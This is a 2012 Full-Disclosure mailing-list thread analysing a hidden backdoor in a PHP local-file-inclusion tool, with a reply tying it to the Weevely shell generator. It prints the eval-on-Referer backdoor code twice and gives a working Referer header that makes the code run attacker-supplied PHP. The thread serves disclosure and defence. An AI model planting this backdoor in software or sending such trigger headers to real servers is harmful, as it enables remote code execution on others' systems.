[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Analysis of the "r00t 4 LFI Toolkit"
- To: Manu <sourvivor@xxxxxxxxx>, "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Analysis of the "r00t 4 LFI Toolkit"
- From: Gage Bystrom <themadichib0d@xxxxxxxxx>
- Date: Mon, 20 Feb 2012 05:37:05 -0800
Uhh no, you misread what he said. He's saying he's seen that code in a few
php shells that were supposedly meant to be private but the authors were
miserable failures and he found the code anyways, not that he wrote it.
On Feb 20, 2012 12:36 AM, "Manu" <sourvivor@xxxxxxxxx> wrote:
> But you saw it in a few """priv8""" php shells? And you say that is your
> code as 'r00t 4 LFI toolkit' ? Pathetic
>
>
> 2012/2/19 InterN0T Advisories <advisories@xxxxxxxxxxxx>
>
>> Thank you for the response, I didn't know it was included in the Weevely
>> tool, but I did see it used in a few "priv8" PHP shells too.
>>
>> On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis
>> <bechtsoudis.a@xxxxxxxxx> wrote:
>> > The backdoor PHP code that you included is exactly the same as generated
>> > by Weevely [1] tool, until the 0.4 version of the tool.
>> >
>> > For convenience I include the base64 decoded Weevely code here too:
>> >
>> > ini_set('error_log','/dev/null');
>> > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' &&
>> > count($a)==9) {echo '<pass>';eval(base64_decode(str_replace(" ", "+",
>> > join(array_slice($a,count($a)-3)))));echo '</pass>';}
>> >
>> >
>> > For more details you can refer at a relevant post I wrote recently [2].
>> >
>> > I haven't dig into "r00t 4 LFI" source code, but from your analysis the
>> > similarities are pretty obvious.
>> >
>> > ps: This email has been BCC'ed to Weevely developer.
>> >
>> >
>> > [1] http://code.google.com/p/weevely/
>> > [2]
>> https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/
>> >
>> >
>> > On 02/19/2012 07:01 PM, InterN0T Advisories wrote:
>> >> Dear Full Disclosure readers,
>> >>
>> >>
>> >> Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI
>> >> Toolkit", that according to its description:
>> >> -------------------------------------------
>> >> This tool is a php script that assists in performing local file
>> inclusion
>> >> attacks.
>> >> -------------------------------------------
>> >>
>> >>>> Should be able to perform local file inclusion attacks.
>> >>
>> >>
>> >> -:: Overview ::-
>> >>
>> >> After studying this tool for a brief 5 minutes, it was obvious that it
>> >> was
>> >> nowhere what I hoped it to be, as the tool only use one method, the
>> >> "/proc/self/environ" vector (as seen on e.g., the intern0t forums and
>> >> many
>> >> other sites).
>> >>
>> >> The tool is therefore, not capable of performing "attacks", but only 1,
>> >> single type of LFI attack. (Note that the 'S' has been removed.)
>> >>
>> >> The method this tool uses, is far from new and doesn't always work
>> >> either,
>> >> but it's a nice trick that e.g., SirGod wrote about on the intern0t
>> >> forums
>> >> in 2009. (This tool was released the 18th February 2012.)
>> >>
>> >>
>> >> -:: Vulnerabilities ::-
>> >>
>> >> Further study of this tool reveals:
>> >> - None of the output from the tool is sanitized, meaning the attacker
>> >> using the script, can get XSS'd (and CSRF'd), if the target has changed
>> >> e.g., the 'uname -a' command (which is relatively simple to do), to
>> >> include
>> >> (print) JavaScript instead. If this happens, the attacker may end up
>> >> attacking himself, crashing or something third, depending on the type
>> of
>> >> XSS payload.
>> >>
>> >> - The most interesting part, is on line 92, where the "developer"
>> >> (KedAns-Dz), has decided to >>backdoor<< the tool.
>> >>
>> >>
>> >> -:: The Backdoor ::-
>> >>
>> >> Analysis of the backdoor:
>> >> By sending a HTTP request, that includes a specially crafted referer,
>> it
>> >> is possible to execute PHP code:
>> >> -------------------------------------------
>> >> Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
>> >> -------------------------------------------
>> >>
>> >>
>> >> This referer will make the script execute: phpinfo();
>> >>
>> >>
>> >> -:: Code Review ::-
>> >>
>> >> The code that enables the developer to use the script as a backdoor
>> looks
>> >> like the following:
>> >> -------------------------------------------
>> >> parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
>> >> count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
>> >> join(array_slice($a,count($a)-3)))));echo '</star>';}
>> >> -------------------------------------------
>> >>
>> >>
>> >> It certainly took a little bit of study to trigger, but in essence
>> here's
>> >> what it do:
>> >> 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not
>> >> included.)
>> >> 2. If the first array value (not key / arg), is a string named: iz
>> >> 3. And if there's 9 (different) arrays, then
>> >> 4. Print out the contents of..
>> >>
>> >>
>> >> This requires a bit more in-depth explanation:
>> >> A) Evaluate the following as PHP code:
>> >> B) Base64_decode the input:
>> >> C) Replace " " (space) with "+" (plus), in case they occur.
>> >> D) Use the last three array values from the HTTP referer.
>> >> (You don't have to use all three, using the last will work fine.)
>> >>
>> >>
>> >> To make it all a lot more simple:
>> >> -------------------------------------------
>> >>
>>
>> Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64
>> >> Code that will be executed as PHP.]
>> >> -------------------------------------------
>> >>
>> >>
>> >> Screenshot:
>> >> http://i.imgur.com/PXcSX.png
>> >>
>> >>
>> >> References:
>> >>
>>
>> http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
>> >>
>>
>> http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html
>> >> http://packetstormsecurity.org/files/109940/
>> >> https://twitter.com/#!/j0emccray/status/170941195030233090
>> >> https://twitter.com/#!/EChavarro/status/170941489629761537
>> >> http://i.imgur.com/PXcSX.png
>> >>
>> >>
>> >>
>> >> Best regards,
>> >> MaXe
>> >>
>> >> _______________________________________________
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> /Manu~
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/